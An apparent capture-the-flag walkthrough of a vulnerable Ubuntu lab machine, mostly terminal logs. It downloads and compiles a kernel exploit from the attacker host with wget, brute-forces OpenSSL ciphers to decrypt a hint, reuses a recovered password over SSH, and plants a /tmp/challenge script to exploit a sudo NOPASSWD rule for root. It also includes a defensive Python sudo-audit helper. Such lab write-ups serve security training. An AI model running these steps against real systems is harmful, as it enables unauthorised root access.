systemd-private-8740a19667584938855afafb4c1c2a3f-colord.service-YJZ2jh
systemd-private-8740a19667584938855afafb4c1c2a3f-rtkit-daemon.service-famTNO
systemd-private-8740a19667584938855afafb4c1c2a3f-systemd-timesyncd.service-dIYR18
vmware-root
www-data@ubuntu:/tmp$ wget http://192.168.248.131/45010.c
wget http://192.168.248.131/45010.c
--2024-12-18 06:15:15-- http://192.168.248.131/45010.c
Connecting to 192.168.248.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-c]
Saving to: '45010.c'
0K .......... .. 100% 390M=0s
2024-12-18 06:15:15 (390 MB/s) - '45010.c' saved [13176/13176]
www-data@ubuntu:/tmp$ gcc 45010.c -o getshell
gcc 45010.c -o getshell
www-data@ubuntu:/tmp$ chmod +x getshell
chmod +x getshell
www-data@ubuntu:/tmp$ ./getshell
./getshell
whami
/bin/sh: 1: whami: not found
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.248.134/24 brd 192.168.248.255 scope global dynamic ens33
valid_lft 990sec preferred_lft 990sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
Check whether Python is available, to upgrade the shell to a proper tty
dpkg -l
python -c"import pty;pty.spawn('/bin/bash')"
root@ubuntu:/tmp# ls
ls
45010
45010.c
VMwareDnD
getshell
systemd-private-8740a19667584938855afafb4c1c2a3f-colord.service-YJZ2jh
systemd-private-8740a19667584938855afafb4c1c2a3f-rtkit-daemon.service-famTNO
systemd-private-8740a19667584938855afafb4c1c2a3f-systemd-timesyncd.service-dIYR18
vmware-root
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/home/victor# cd /root
cd /root
root@ubuntu:/root# ls
ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
root@ubuntu:/root#
The kernel-exploit route is complete.
OpenSSL decryption
Continuing from the result above
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
/home/saket/enc can be run as root without a password.
Not knowing what enc does, run it and see.
www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password:
It asks for a password. We don't have one, so look for password files.
www-data@ubuntu:/home/saket$ find / -name '*pass*' 2>/dev/null | sort | less
One file is found:
/opt/backup/server_database/backup_pass
Read it:
www-data@ubuntu:/opt/backup$ cd server_database
cd server_database
www-data@ubuntu:/opt/backup/server_database$ ls
ls
backup_pass
{hello.8}
www-data@ubuntu:/opt/backup/server_database$ ls -liah
ls -liah
total 12K
414038 drwxr-xr-x 2 root root 4.0K Aug 30 2019 .
414037 drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
414108 -rw-r--r-- 1 root root 75 Aug 30 2019 backup_pass
414042 -rw-r--r-- 1 root root 0 Aug 30 2019 {hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
www-data@ubuntu:/opt/backup/server_database$
The password for enc is `backup_password`; run it:
www-data@ubuntu:/opt/backup/server_database$ sudo /home/saket/enc
sudo /home/saket/enc
enter password: backup_password
good
www-data@ubuntu:/tmp$ cd /home/saket/
cd /home/saket/
www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
www-data@ubuntu:/home/saket$
Two new files have appeared next to enc: key.txt and enc.txt.
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
Following the hint, hash `ippsec` with md5, then hex-encode the digest text itself (each of the 32 hex characters becomes two) and strip spaces and newlines:
┌──(root㉿Kali)-[~/nmapscan]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'| tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431
We now have a ciphertext and a hex key, which points to OpenSSL decryption, but the cipher is unknown, so write a loop that tries every cipher type.
First put the cipher names into a file:
┌──(root㉿Kali)-[~/nmapscan]
└─# cat CipherTypeRaw
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
Replace spaces with newlines, then sort and deduplicate
┌──(root㉿Kali)-[~/nmapscan]
└─# awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq > CipherTypes
Write the decryption loop
┌──(root㉿Kali)-[~/nmapscan]
└─# for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
The decrypted message:
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor.
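The key derivation and cipher enumeration above (and the OpenSSL template at the top of the page), as an added Python example that is not part of the original write-up: it reproduces the md5 to od pipeline with hashlib, separates the `openssl --help` listing into digests and ciphers (the CipherTypeRaw file above mixes both), and narrows the candidates to the modes that can work with `-K` and no `-iv`. The help excerpt embedded in the block is a constructed subset of the listing shown earlier on this page.

```python
import hashlib

# Constructed excerpt of the `openssl --help` listing shown earlier on this page.
OPENSSL_HELP = """\
Standard commands
asn1parse ca ciphers cmp
dgst enc engine errstr
Message Digest commands (see the `dgst' command for more details)
blake2b512 blake2s256 md4 md5
sha384 sha512 sha512-224 sha512-256
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
des-ede3-ofb des-ofb des3 desx
rc2-cfb rc2-ecb rc2-ofb rc4
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
"""

# Printed under "Cipher commands", but these are an encoding and two compressors.
NOT_A_CIPHER = {"base64", "zlib", "zstd"}

# Names with IV length 0 in enc(1) besides the -ecb variants: the rc4 stream
# cipher and the ECB-mode triple-DES aliases des-ede / des-ede3.
IV_LESS_NAMES = {"rc4", "rc4-40", "des-ede", "des-ede3"}


def derive_key_hex(word: str) -> str:
    """Reproduce the page's pipeline
       echo -n word | md5sum | awk ... | od -A n -t x1
    The 32-character md5 hex digest *text* is hex-encoded a second time,
    so the result is 64 hex characters, i.e. a 32-byte (256-bit) key.
    """
    digest_text = hashlib.md5(word.encode()).hexdigest()
    return digest_text.encode("ascii").hex()


def key_bits(key_hex: str) -> int:
    """Key size in bits implied by a -K value (4 bits per hex character)."""
    return len(key_hex) * 4


def split_help_listing(help_text: str) -> dict:
    """Separate the listing into digests and ciphers.

    Only cipher names are valid switches for `openssl enc`; the digest names
    in the page's CipherTypeRaw file just make each of those iterations fail.
    """
    sections = {"digests": set(), "ciphers": set()}
    current = None
    for line in help_text.splitlines():
        if line.startswith("Message Digest commands"):
            current = "digests"
        elif line.startswith("Cipher commands"):
            current = "ciphers"
        elif line.endswith("commands"):  # "Standard commands": not algorithms
            current = None
        elif current:
            sections[current].update(line.split())
    return {
        "digests": sorted(sections["digests"]),
        "ciphers": sorted(sections["ciphers"] - NOT_A_CIPHER),
    }


def iv_less_ciphers(ciphers) -> list:
    """openssl enc aborts with "iv undefined" when -K is given without -iv
    for any mode that needs an IV, so a loop that passes only -K can only
    ever succeed with one of these."""
    return [c for c in ciphers if c.endswith("-ecb") or c in IV_LESS_NAMES]
```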
Try logging in over SSH
┌──(root㉿Kali)-[~]
└─# ssh saket@192.168.248.134
saket@192.168.248.134's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
670 packages can be updated.
510 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sat Aug 31 05:31:31 2019
$
Login successful
Privilege escalation enumeration
$ whomai
-sh: 1: whomai: not found
$ whoami
saket
$ id
uid=1001(saket) gid=1001(saket) groups=1001(saket)
$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.248.134/24 brd 192.168.248.255 scope global dynamic ens33
valid_lft 1706sec preferred_lft 1706sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
$ ls
enc enc.txt key.txt password.txt user.txt
The useful hint:
(root) NOPASSWD:/home/victor/undefeated_victor
Upgrade the shell for better interactivity
$ python -c "import pty;pty.spawn('/bin/bash');"
saket@ubuntu:~$
Following the hint, run `/home/victor/undefeated_victor`
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$
From the output, undefeated_victor evidently tries to execute `/tmp/challenge`:
/tmp/challenge: not found
Create the escalation script
saket@ubuntu:/tmp$ echo '#!/bin/bash' > challenge
saket@ubuntu:/tmp$ echo '/bin/bash' >> challenge
saket@ubuntu:/tmp$ cat challenge
#!/bin/bash
/bin/bash
Run `/home/victor/undefeated_victor`
saket@ubuntu:/tmp$ chmod +x challenge
saket@ubuntu:/tmp$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.248.134/24 brd 192.168.248.255 scope global dynamic ens33
valid_lft 1252sec preferred_lft 1252sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:/root# ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root#
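An audit of the sudo misconfiguration that both escalation paths above rely on, as an added Python example that is not part of the original write-up: it parses `sudo -l` output (the copy in the block is reconstructed from this page), checks each permitted command for group/world-writable files or parent directories, and reads shell-script targets for references to paths under shared writable directories such as /tmp, which is exactly what makes undefeated_victor exploitable. The `demo()` fixture is a constructed stand-in for the real script, not its actual contents.

```python
import re
import stat
import tempfile
from pathlib import Path

# Reconstructed copy of the `sudo -l` output shown above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
"""

# "(runas) TAG: TAG: /absolute/command" lines from `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")
SHARED_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Absolute paths inside a script body (shebang interpreters included).
ABS_PATH_RE = re.compile(r"(?<![\w/.-])(/[\w./-]+)")


def parse_sudo_rules(text: str) -> list:
    """Pull (runas, NOPASSWD flag, command path) out of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"],
                          "nopasswd": "NOPASSWD" in m["tags"],
                          "cmd": m["cmd"]})
    return rules


def writable_by_others(path: Path) -> bool:
    """True when group or world can modify the file or directory."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_rule(rule: dict) -> list:
    """Findings for one rule: NOPASSWD, missing target, writable target or
    parent, and script bodies that run something under a shared writable dir."""
    findings = []
    cmd = Path(rule["cmd"])
    if rule["nopasswd"]:
        findings.append("NOPASSWD: runs as %s without re-authentication" % rule["runas"])
    if not cmd.exists():
        findings.append("target does not exist: %s" % cmd)
        return findings
    for p in (cmd, cmd.parent):
        if writable_by_others(p):
            findings.append("group/world writable: %s" % p)
    try:
        body = cmd.read_text()
    except (UnicodeDecodeError, OSError):
        return findings  # compiled binary: nothing to inspect as a script
    for ref in ABS_PATH_RE.findall(body):
        if ref.startswith(SHARED_WRITABLE_DIRS):
            findings.append("script runs a path under a shared writable directory: %s" % ref)
    return findings


def demo() -> list:
    """Constructed stand-in for the page's scenario: a script that prints the
    taunt and then runs /tmp/challenge, granted to saket via NOPASSWD."""
    with tempfile.TemporaryDirectory() as d:
        script = Path(d) / "undefeated_victor"
        script.write_text("#!/bin/bash\n"
                          "echo 'if you can defeat me then challenge me in front of you'\n"
                          "/tmp/challenge\n")
        script.chmod(0o755)
        rule = {"runas": "root", "nopasswd": True, "cmd": str(script)}
        return audit_rule(rule)
```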
The OpenSSL route is complete.